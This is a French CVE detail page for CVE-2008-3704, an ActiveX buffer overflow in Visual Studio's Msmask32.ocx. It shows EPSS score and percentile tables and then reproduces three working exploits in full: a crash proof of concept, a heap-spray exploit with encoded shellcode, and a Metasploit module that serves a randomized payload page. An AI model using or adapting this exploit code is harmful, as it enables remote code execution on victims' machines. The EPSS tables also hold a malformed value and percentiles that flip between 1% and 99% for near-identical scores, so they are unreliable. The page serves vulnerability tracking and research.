CVE-2008-3704 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	87.31%	–	–
2023-03-12	–	–	–	97.11%	–
2023-04-02	–	–	–	97.06%	–
2023-05-14	–	–	–	96.89%	–
2023-06-18	–	–	–	96.52%	–
2023-07-30	–	–	–	96.53%	–
2023-09-03	–	–	–	96.34%	–
2023-10-08	–	–	–	96.54%	–
2023-11-12	–	–	–	95.91%	–
2023-12-17	–	–	–	95.82%	–
2024-01-28	–	–	–	96.4%	–
2024-02-11	–	–	–	96.4%	–
2024-03-03	–	–	–	96.37%	–
2024-04-07	–	–	–	96.6%	–
2024-06-02	–	–	–	96.03%	–
2024-06-16	–	–	–	96.34%	–
2024-07-21	–	–	–	96.53%	–
2024-08-25	–	–	–	96.38%	–
2024-12-22	–	–	–	96.1%	–
2025-03-02	–	–	–	95.91%	–
2025-01-19	–	–	–	96.1%	–
2025-03-09	–	–	–	95.91%	–
2025-03-18	–	–	–	–	80.63%
2025-03-30	–	–	–	–	81.78%
2025-03-30	–	–	–	–	81.78,%

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Date	Percentile
2022-02-06	1%
2023-03-12	1%
2023-04-02	1%
2023-05-14	1%
2023-06-18	99%
2023-07-30	99%
2023-09-03	99%
2023-10-08	99%
2023-11-12	99%
2023-12-17	99%
2024-01-28	99%
2024-02-11	1%
2024-03-03	1%
2024-04-07	1%
2024-06-02	99%
2024-06-16	1%
2024-07-21	1%
2024-08-25	1%
2024-12-22	1%
2025-03-02	1%
2025-01-19	1%
2025-03-09	1%
2025-03-18	99%
2025-03-30	99%
2025-03-30	99%

var body='<OBJECT CLASSID="CLSID:C932BA85-4374-101B-A56C-00AA003668DC" width="10"><PARAM NAME="Mask" VALUE="'; var body1='"></OBJECT>'; var buf=''; for (i=1;i<=1945;i++){buf=buf+unescape("%0C");} document.write(body+buf+body1); # milw0rm.com [2008-08-14]

Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote Buffer Overflow Exploit Author: Koshi Original POC: http://www.milw0rm.com/exploits/6244 ( Not by me ) My first ActiveX exploit, learned quite a bit playing with this one. Heaps are handy. ################################################# Loaded File: C:\WINDOWS\system32\MSMASK32.OCX Name: MSMask Version: 1.1 Class MaskEdBox GUID: {C932BA85-4374-101B-A56C-00AA003668DC} Number of Interfaces: 1 Default Interface: IMSMask RegKey Safe for Script: False RegKey Safe for Init: True KillBitSet: False ################################################# gr33tz: Rima my baby, str0ke, mess, and to all of those who have helped me over the years! <input language=JavaScript onclick=doIt() type=button value="Test Exploit"> <script language="JavaScript"> function doIt() { var body='<OBJECT CLASSID="CLSID:C932BA85-4374-101B-A56C-00AA003668DC" width="10"><PARAM NAME="Mask" VALUE="'; var body1='"></OBJECT>'; var buf1 = ''; for (i=1;i<=1945;i++){buf1=buf1+unescape("%0c");} // win32_exec - EXITFUNC=process CMD=calc Size=330 Encoder=Alpha2 http://metasploit.com var shellcode = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4937%u4949%u4949%u4949%u4949" + "%u4949%u4949%u4949%u4949%u5a51%u456a%u5058%u4230%u4130%u416b" + "%u5541%u4132%u3242%u4242%u4142%u4230%u5841%u3850%u4241%u7875" + "%u7969%u6d6c%u3038%u6544%u7550%u7350%u6e30%u516b%u7755%u4c4c" + "%u414b%u656c%u3355%u4348%u3831%u4c6f%u304b%u464f%u4c78%u314b" + "%u374f%u3450%u4a41%u624b%u4e69%u666b%u6e54%u666b%u6a61%u304e" + "%u3931%u4f50%u4c69%u6f6c%u5974%u3450%u3534%u5957%u7951%u565a" + "%u776d%u6f71%u7832%u6b6b%u6744%u714b%u6744%u7754%u3474%u4b35" + "%u6e55%u436b%u466f%u6544%u3851%u506b%u4c66%u564b%u306c%u4c4b" + "%u414b%u374f%u656c%u5a51%u6c4b%u654b%u4c4c%u674b%u6871%u6e6b" + "%u7169%u654c%u6674%u5964%u4653%u4951%u6550%u6c34%u634b%u3470" + "%u4b70%u4b35%u5470%u3438%u6e4c%u436b%u6670%u4e6c%u626b%u7550" + "%u4c4c%u6e6d%u536b%u3758%u4a78%u554b%u4c59%u6d4b%u6e50%u6550" + "%u6550%u4750%u6c70%u434b%u6558%u716c%u464f%u5a51%u4156%u3070" + "%u4d56%u6c59%u4e38%u4963%u7150%u526b%u7570%u7138%u4b6e%u4b68" + "%u3152%u6563%u4c38%u5958%u6e6e%u746a%u714e%u4b47%u7a4f%u7047" + "%u6363%u5251%u634c%u5553%u4550"); // A read through "Heap Feng Shui in JavaScript" shed some // much needed light on this topic for me. Thank you Alexander Sotirov. var shellcodeSize = (shellcode.length * 2); var spraySled = unescape("%u9090%u9090"); var heapAddress = 0x0c0c0c0c; var heapBlockSize = 0x100000; var spraySledSize = heapBlockSize - (shellcodeSize + 1); var heapBlocks = (heapAddress+heapBlockSize)/heapBlockSize; var x = new Array(); while (spraySled.length*2<spraySledSize) { spraySled += spraySled; } spraySled = spraySled.substring(0,spraySledSize/2); for (i=0;i<heapBlocks;i++) { x[i] = spraySled + shellcode; } document.write(body+buf1+body1); } </script> # milw0rm.com [2008-08-26]

## # $Id: ms08_070_visual_studio_msmask.rb 11127 2010-11-24 19:35:38Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft Visual Studio Msmask32.ocx ActiveX Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in Microsoft's Visual Studio 6.0. When passing a specially crafted string to the Mask parameter of the Msmask32.ocx ActiveX Control, an attacker may be able to execute arbitrary code. }, 'License' => MSF_LICENSE, 'Author' => [ 'koshi', 'MC' ], 'Version' => '$Revision: 11127 $', 'References' => [ [ 'CVE', '2008-3704' ], [ 'OSVDB', '47475' ], [ 'BID', '30674' ], [ 'MSB', 'MS08-070' ] ], 'DefaultOptions' => { 'EXITFUNC' => 'process', }, 'Payload' => { 'Space' => 1024, 'BadChars' => "\x00", }, 'Platform' => 'win', 'Targets' => [ [ 'Windows XP SP0-SP2 IE 6.0 SP0-SP2', { 'Ret' => '' } ] ], 'DisclosureDate' => 'Aug 13 2008', 'DefaultTarget' => 0)) register_options( [ OptString.new('URIPATH', [ true, "The URI to use.", "/" ]) ], self.class) end def autofilter false end def check_dependencies use_zlib end def on_request_uri(cli, request) # Re-generate the payload. return if ((p = regenerate_payload(cli)) == nil) # Encode the shellcode. shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) # Create some nops. nops = Rex::Text.to_unescape(make_nops(4)) # Randomize the javascript variable names. vname = rand_text_alpha(rand(100) + 1) var_i = rand_text_alpha(rand(30) + 2) rand1 = rand_text_alpha(rand(100) + 1) rand2 = rand_text_alpha(rand(100) + 1) rand3 = rand_text_alpha(rand(100) + 1) rand4 = rand_text_alpha(rand(100) + 1) rand5 = rand_text_alpha(rand(100) + 1) rand6 = rand_text_alpha(rand(100) + 1) rand7 = rand_text_alpha(rand(100) + 1) rand8 = rand_text_alpha(rand(100) + 1) rand9 = rand_text_alpha(rand(100) + 1) rand10 = rand_text_alpha(rand(100) + 1) rand11 = rand_text_alpha(rand(100) + 1) content = %Q| <html> <script language="javascript"> var #{rand1}='<object classid="clsid:C932BA85-4374-101B-A56C-00AA003668DC"><param name="Mask" value="'; var #{rand2}='"></object>'; var #{rand3} = ''; for (#{var_i}=1;#{var_i}<=2145;#{var_i}++){#{rand3}=#{rand3}+unescape("%0c");} var #{rand4} = unescape("#{shellcode}"); var #{rand5} = (#{rand4}.length * 2); var #{rand6} = unescape("#{nops}"); var #{rand7} = 0x0c0c0c0c; var #{rand8} = 0x100000; var #{rand9} = #{rand8} - (#{rand5} + 1); var #{rand10} = (#{rand7}+#{rand8})/#{rand8}; var #{rand11} = new Array(); while (#{rand6}.length*2<#{rand9}) { #{rand6} += #{rand6}; } #{rand6} = #{rand6}.substring(0,#{rand9}/2); for (#{var_i}=0;#{var_i}<#{rand10};#{var_i}++) { #{rand11}[#{var_i}] = #{rand6} + #{rand4}; } document.write(#{rand1}+#{rand3}+#{rand2}); </script> </html> | print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...") # Transmit the response to the client send_response_html(cli, content) # Handle the payload handler(cli) end end